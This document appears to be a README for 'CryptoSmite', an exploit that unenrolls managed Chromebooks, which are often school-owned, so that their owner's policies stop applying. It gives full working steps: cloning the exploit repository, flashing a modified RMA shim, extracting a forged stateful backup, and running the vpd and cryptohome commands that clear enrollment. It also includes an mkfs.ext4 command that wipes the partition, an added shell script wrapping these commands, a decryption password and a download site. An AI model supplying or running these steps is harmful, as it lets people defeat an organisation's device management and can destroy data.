CryptoSmite Unenrollment Exploit
FWSmasher, unretained, fallenmoon8080, Catakang#0987


The kernel version (the kernver= line on the recovery screen) of your Chromebook must end with a 0, 1, or 2 for this exploit to work.

An unenrollment exploit that restores a modified stateful partition backup to unenroll the device.

How it works

The exploit abuses stateful partition backups: restoring a backup lets you replace the encrypted contents of the stateful partition with arbitrary data. Because enrollment status is stored there, the restored data makes the device appear unenrolled. On the OOBE screen, ChromeOS starts the AutoEnrollmentController, which chains into the ash ownership system; the ownership system then checks for a file, and if that file exists, it removes the firmware management parameters (FWMP).

Performing the exploit

NOTICE: The authors are not responsible for any damage caused by the use of this exploit. Do not contact them for any issues it causes to your device.

    Instructions

  1. Enter Recovery Mode by holding ESC + Refresh + Power for 2 or 3 seconds. You should see an "Insert Recovery Media" or "Let's step you through the recovery process" screen.
  2. Check your kernel version for compatibility by pressing TAB and looking at the last digit of the kernver= line. If it is a 0, 1, or 2, your Chromebook is supported and you can downgrade to ChromeOS version 119 or lower. Follow the instructions in the Downgrade Versions section.
  3. If the last digit of the kernver= line is a 3, your Chromebook is not supported and cannot be downgraded to ChromeOS version 119 or lower. Wait for a new unenrollment exploit or do a dangerous hardware modification here.
  4. On a personal device, download stateful.tar.xz and the Cryptsetup chroot st.tar.xz. For raw RMA shims, check the SH1MMER Discord server. Have all of these downloads ready before starting.
  5. In a Linux terminal (real Linux, WSL, or a virtual machine) run: git clone https://github.com/FWSmasher/CryptoCrafter
  6. Change into the cloned directory (the script must be run from inside it) and run: ./cryptosmite_host.sh

    Prepare the new RMA shim for flashing
  7. Open the Chromebook Recovery Utility extension and, in the top right corner, select "Use local image." Choose the modified RMA shim as the image.
  8. Select the USB drive to flash.

    Boot the RMA shim
  9. Enter recovery mode by pressing ESC + Refresh + Power.
  10. On the recovery mode screen, press Ctrl + D to try to enable developer mode.
  11. Developer mode will be blocked by policy, as shown in the top left corner of the screen.
  12. Press ESC + Refresh + Power again, then plug in the USB drive you have just flashed.

    Running the injected CryptoSmite file
  13. Run cryptosmite.sh in the injected RMA shim.
  14. In the bash shell prompt on the edit stateful bash shell screen, run:
      tar -xvf /mnt/shim_stateful/stateful.tar.xz -C /mnt/stateful
      exit
  15. The system will now reboot into verified mode.
  16. Press the OK button at the OOBE screen or the add user screen.
  17. Once you reach the add user screen, enable developer mode. If you do not reach the add user screen or it gets stuck, open an issue on the GitHub repository.
  18. To enable developer mode, press ESC + Refresh + Power to enter recovery mode, then press Ctrl + D.

    From here, there are two ways to proceed. You can wait out the five-minute developer mode transition by pressing Ctrl + D, or skip it.

    How to skip the 5 minute developer mode wait and transition
  19. Once you have reached the "developer mode is on" screen, press ESC + Refresh + Power and boot into an RMA shim.
  20. Select the bash shell and run the following commands (or put them in a bash script). /dev/mmcblk0p1 is the stateful partition on eMMC devices; if your device boots from a different disk (for example NVMe), check the partition name with lsblk first.
      mkfs.ext4 /dev/mmcblk0p1 -F
      mount -o loop,rw /dev/mmcblk0p1 /tmp
      touch /tmp/.developer_mode
      umount /tmp && sync
      reboot
  21. On "enrollment" branch shims, this script is already included in the new menu.
  22. After enabling developer mode by either of the two methods above, boot into the operating system and run the last two commands below in the VT2 shell (press Ctrl + Alt + F2 and log in as root). These commands will NOT work in a shim.

    Quickly after you boot, run these commands:
      vpd -i RW_VPD -s check_enrollment=0
      cryptohome --action=remove_firmware_management_parameters

    If you do not get the timing right, powerwash the Chromebook and try again. If the timing and everything else were correct, you are done: exit the VT2 shell by pressing Ctrl + Alt + F1 and follow the on-screen instructions to add your personal and school accounts on the now-unenrolled device. After that, you can do whatever you want on the unenrolled Chromebook.
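    The two manual command groups above (the developer mode skip in the shim, and the final VT2 commands) as one POSIX shell script with basic checks. This is an added example, not a script from the CryptoSmite repository or from the "enrollment" branch shim menu. It assumes, beyond what the page states, that the stateful partition is partition 1 of the boot disk and that the disk name follows the kernel naming rule (a "p" separator when the disk name ends in a digit); the default disk mmcblk0 and the /tmp mountpoint are taken from the instructions. After clearing the flags it reads check_enrollment back with vpd -g so you can confirm the write took effect.

```shell
#!/bin/sh
# Added example (not from the CryptoSmite project). Run inside the shim
# bash shell as "skip [disk]" to drop the .developer_mode marker, or in
# the VT2 root shell after booting the OS as "unenroll".
# Assumption: the stateful partition is partition 1 of the boot disk.
set -eu

# Map a disk name to its first partition. Kernel naming rule: disks whose
# name ends in a digit (mmcblk0, nvme0n1) get a "p" separator, others
# (sda) do not.
stateful_partition_for_disk() {
    disk="$1"
    case "$disk" in
        *[0-9]) printf '%sp1\n' "$disk" ;;
        *)      printf '%s1\n'  "$disk" ;;
    esac
}

# Shim side: reformat the stateful partition, write the .developer_mode
# marker, sync, unmount, reboot. Refuses to run if the device node does
# not exist so a mistyped disk name cannot format the wrong device.
skip_dev_mode_wait() {
    dev="/dev/$(stateful_partition_for_disk "${1:-mmcblk0}")"
    mnt="${2:-/tmp}"
    [ -b "$dev" ] || { echo "no block device at $dev" >&2; return 1; }
    mkfs.ext4 -F "$dev"
    mount -o rw "$dev" "$mnt"
    touch "$mnt/.developer_mode"
    sync
    umount "$mnt"
    reboot
}

# OS side (VT2 as root; these do not work inside a shim): clear the
# enrollment flag in RW_VPD, remove the firmware management parameters,
# then print the flag back so the result can be checked.
unenroll_flags() {
    vpd -i RW_VPD -s check_enrollment=0
    cryptohome --action=remove_firmware_management_parameters
    vpd -i RW_VPD -g check_enrollment
}

case "${1:-}" in
    skip)     skip_dev_mode_wait "${2:-mmcblk0}" ;;
    unenroll) unenroll_flags ;;
    *)        echo "usage: $0 skip [disk] | unenroll" >&2 ;;
esac
```

    Without an argument the script only prints its usage, so sourcing or running it by mistake does nothing destructive; the mkfs only happens when "skip" is given and the device node exists.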

    EXTRA NOTE: The password to decrypt cryptosmite_sh1mmer (the encrypted version of CryptoSmite bundled with SH1MMER) is: Info-58-immense!NickName_Arabia-710. If you want prebuilt shims that boot straight into CryptoSmite, visit dl.darkn.bio.